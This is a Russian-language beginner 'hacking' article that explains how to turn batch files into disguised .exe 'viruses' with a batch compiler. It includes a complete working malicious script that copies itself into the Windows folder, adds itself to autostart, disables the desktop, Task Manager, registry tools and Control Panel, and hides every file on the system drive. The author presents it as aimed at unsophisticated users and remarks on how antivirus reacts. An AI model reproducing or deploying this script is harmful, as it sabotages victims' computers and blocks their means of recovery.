Создаем *.exe вирусы из *.bat файлов
[ Хакерство для новичков ]
Создаем *.exe вирусы из *.bat файлов
Это моя первая статья (возможно, что и последняя) так что не сильно меня ругайте. Это, так сказать, мои философические измышления.
Итак, чтобы создать *.exe вирус нам понадобится программа "Quick Batch File Compiler" и знание команд исполняемых в командной строке. Программу скачиваем с сайта "DreamProgs.net", а если не знаем команды исполняемые в командной строке, то заходим в "Справку и поддержку" Виндоуса и в поле для поиска пишем что-то вроде "параметры командной строки" и среди результатов найдете эти команды.
Программа довольно проста в изучении и через день вы во всем разберетесь. После запуска программы мы видим панельку с кнопками "New" - создать новый проект, "Open" - открыть *.bat файл, "Save" - сохранить то, что в окне в *.bat файл, "Undo", "Redo", "Cut", "Copy", "Paste", "Help" вы и сами знаете, "Build" - скомпилировать *.exe файл, "Options" - там выбираете тип вируса (выводить окно командной строки или нет во время исполнения вируса).
Далее внизу панельки есть три вкладки:
"Source" - исходный текст вашего вируса
"Version Info" - маскируем вирус под хорошую программу
"Embedded Files" - выбираем иконку для вируса и можем добавить в *.exe файл другие файлы (не знаю как работает)
Kaspersky Internet Security при высокой защите (мониторинг реестра и т. д.) выводит запрос на изменение реестра и продвинутые пользователи могут догадаться что это вирус. И еще, если вирус прописывает себя в автозагрузку, то антивирус поднимает тревогу.
Привожу пример созданного мной вируса (хотя это не совсем вирус и рассчитан он для очень простых пользователей)
if exist %windir%infwincfg.exe goto tof
copy /y %0 %windir%infwincfg.exe
:tof
reg add "HKLMSOFTWAREMicrosoftWindowsCurrentVersionRun" /v wincfg /t reg_sz /d %windir%infwincfg.exe /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoDesktop /t reg_dword /d 00000001 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoActiveDesktop /t reg_dword /d 00000001 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoViewContextMenu /t reg_dword /d 00000001 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoControlPanel /t reg_dword /d 00000001 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer" /v NoThemesTab /t reg_dword /d 00000001 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableTaskMgr /t reg_dword /d 00000001 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableRegistryTools /t reg_dword /d 00000001 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v NoDispBackgroundPage /t reg_dword /d 00000001 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v NoDispScrSavPage /t reg_dword /d 00000001 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v NoDispSettingsPage /t reg_dword /d 00000001 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v Start_ShowRun /t reg_dword /d 00000000 /f
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced" /v Start_ShowControlPanel /t reg_dword /d 00000000 /f
cd %windir%
cd ..
attrib +h +s *
"wincfg.exe" это имя вируса. "If exist...." - проверяет имеется ли файл wincfg.exe и если не имеется то копирует себя, а если не имеется то переходит к строке ":tof" и выполняет команды находящиеся под ней. Четвертая строка добавляет вирус в автозагрузку. Следующие за ней причиняют поправимый вред - рабочий стол запрещается, при нажатии правой кнопки мыши на рабочем столе не появляется меню, становится недоступной "Панель управления", запрещается "Диспетчер задач", в меню "Пуск" исчезает кнопка "Выполнить" и т. д. "cd %windir%" - выбирает в качестве рабочего каталога каталог Windows, "cd .." - выбирает в качестве каталога диск в котором находится папка Windows, "attrib +h +s *" - делает все файлы на диске скрытыми и системными (эта команда требует много системных ресурсов).
Предоставил:
Deynozuh